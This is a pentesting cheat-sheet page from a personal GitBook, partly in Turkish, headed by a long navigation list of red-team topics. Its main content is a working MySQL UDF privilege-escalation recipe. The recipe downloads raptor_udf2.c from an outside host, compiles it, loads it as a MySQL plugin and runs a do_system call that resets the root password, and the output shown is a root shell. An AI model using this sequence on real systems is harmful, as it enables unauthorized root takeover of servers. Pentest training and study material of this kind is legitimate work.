Tufan Turhan
  • Introduction
  • Red Teaming
    • Initial Access
      • VoipHopper
      • SMB – SCF File Attacks
      • MITM6
      • LLMNR, NBT-NS, mDNS Zehirlemeleri ve Relay Ataklar
    • Responder - DNS Injection
    • Privilege Escalation
      • PrintNightmare
      • Juicy Potato ile Windows Yetki Yükseltme
      • Token Impersonation with Incognito
    • Active Directory & Kerberos
      • Kerberos
      • Kerberosting
      • AS-REP Roasting
      • Overpass The Hash/Pass The Key (PTK)
      • DCSync Attack
      • DCShadow Attack
      • GETTGT
      • Golden Tickets
      • Silver Tickets
      • PowerView
      • MS14-025 (GPP Abusing)
      • BloodHound
      • Procdump
    • Lateral Movement
      • RDP MiTM-Hijacking
      • Vlan Hopping
      • Pivoting
    • Network Pentest
      • IPv4 Subnet Cheat Sheet
      • DNS Spoofing
      • DHCP Rogue
    • Shell to Meterpreter
    • Turn Off or Bypass AV
    • Useful CMD or Powershell Command
    • Brute Force
    • Windows Dosya İndirme
    • Windows UAC Bypass
    • Insecure Dosya İzni
  • Pentesting
    • Pentesting FTP - 21
    • Pentesting SMTP - 25,465,587
    • Pentesting SMB - 139 & 445
    • Pentesting Telnet - 23
    • Pentesting DNS - 53
    • Pentesting MSRPC -135
    • Pentesting SNMP - 161,162
    • Pentesting LDAP - 389,636
    • Pentesting MSSQL - 1433
    • Pentesting MYSQL - 3306
    • Pentesting RDP - 3389
    • Pentesing WINRM 5985,5986
  • Web Application
    • 2FA/OTP Bypass
    • Captcha Bypass
    • Cache Poisoning
    • Command Injection (OS)
    • CRLF Injection
    • Cross-site WebSocket hijacking (CSWSH) -
    • Cross-site request forgery (CSRF) -
    • Dangling Markup -
    • Path traversal
    • File Upload
    • Formula Injection (CSV Injection)
    • Login Bypass List
    • OAuth -
    • Open Redirect
    • Race Condition -
    • Registration - Password Reset & Takeover Vulnerabilities
    • SQL Injection
    • SSRF
  • Linux Privilege Escalation
    • PHP Wrapper
    • Simple Http
    • Editing /etc/passwd
    • SUID Binaries
    • Sudo Rights
    • Otomatize Araçlar
    • OSCP Not
  • HTB
  • Reverse Shell w/Msfvenom
  • Upgrading Simple Shells to Fully Interactive TTYs
Powered by GitBook
On this page
  1. Pentesting

Pentesting MYSQL - 3306

Local privilege escalation through MySQL run with root privileges

# Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
$ wget 0xdeadbeef.info/exploits/raptor_udf2.c
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/user/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');

user:~$ su -
Password:
user:~# whoami
root
root:~# id
uid=0(root) gid=0(root) groups=0(root)
PreviousPentesting MSSQL - 1433NextPentesting RDP - 3389

Last updated 2 years ago